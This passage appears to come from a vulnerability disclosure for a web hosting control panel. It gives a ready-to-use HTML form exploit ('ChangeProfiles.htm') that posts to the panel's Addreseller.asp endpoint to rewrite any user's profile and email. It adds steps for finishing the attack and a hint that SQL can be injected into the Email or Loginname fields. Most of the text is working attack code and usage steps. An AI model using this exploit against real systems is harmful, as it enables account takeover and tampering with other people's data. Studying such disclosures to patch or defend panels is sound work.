4- [Remote Attacker] can change all user's profiles.
 4.1- Use "Change Profiles.htm"
        ~~~~~~~~~~~~~~~~4.1.1 ChangeProfiles.htm~~~~~~~~~~~~~~~~~~~~~~~~
   <script>
            function check(){
                _action = '/Hosting/Addreseller.asp?loginname=ResAdmin'
                frmChangeProfile.action = window.document.all.URL.value + _action
                return true;
            }
            </script>
            URL: <input type="text" name="URL" /><br />
            <form name="frmChangeProfile" action="" method="post" onsubmit="return check()">
                UserName: <input type="text" name="loginname" value="Victim User" /> <br />
                first name: <input type="text" name="first_name" value="" /> <br />
                last name: <input type="text" name="last_name" value="" /> <br />
                description: <input type="text" name="description" value="" /> <br />
                company: <input type="text" name="company" value="" /> <br />
                email: <input type="text" name="email" value="User's Actual Email Address" /> <br />
                country: <input type="text" name="country" value="" /> <br />
                state: <input type="text" name="state" value="" /> <br />
                city: <input type="text" name="city" value="" /> <br />
                address: <input type="text" name="address" value="" /> <br />
                phone: <input type="text" name="phone" value="" /> <br />
                fax: <input type="text" name="fax" value="" /> <br />
                zip: <input type="text" name="zip" value="" /> <br />
                <input type="submit" />
            </form>
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        Note: "ResAdmin" in "_action" can change to "hcadmin" or an another valid username.
    4.2- Now Goto: http://[HC URL]/hosting/xml_addresellerresult.asp
    4.3- A user can inject a SQL query in "Email" or "Loginname" field to change user's profile without having his email address too.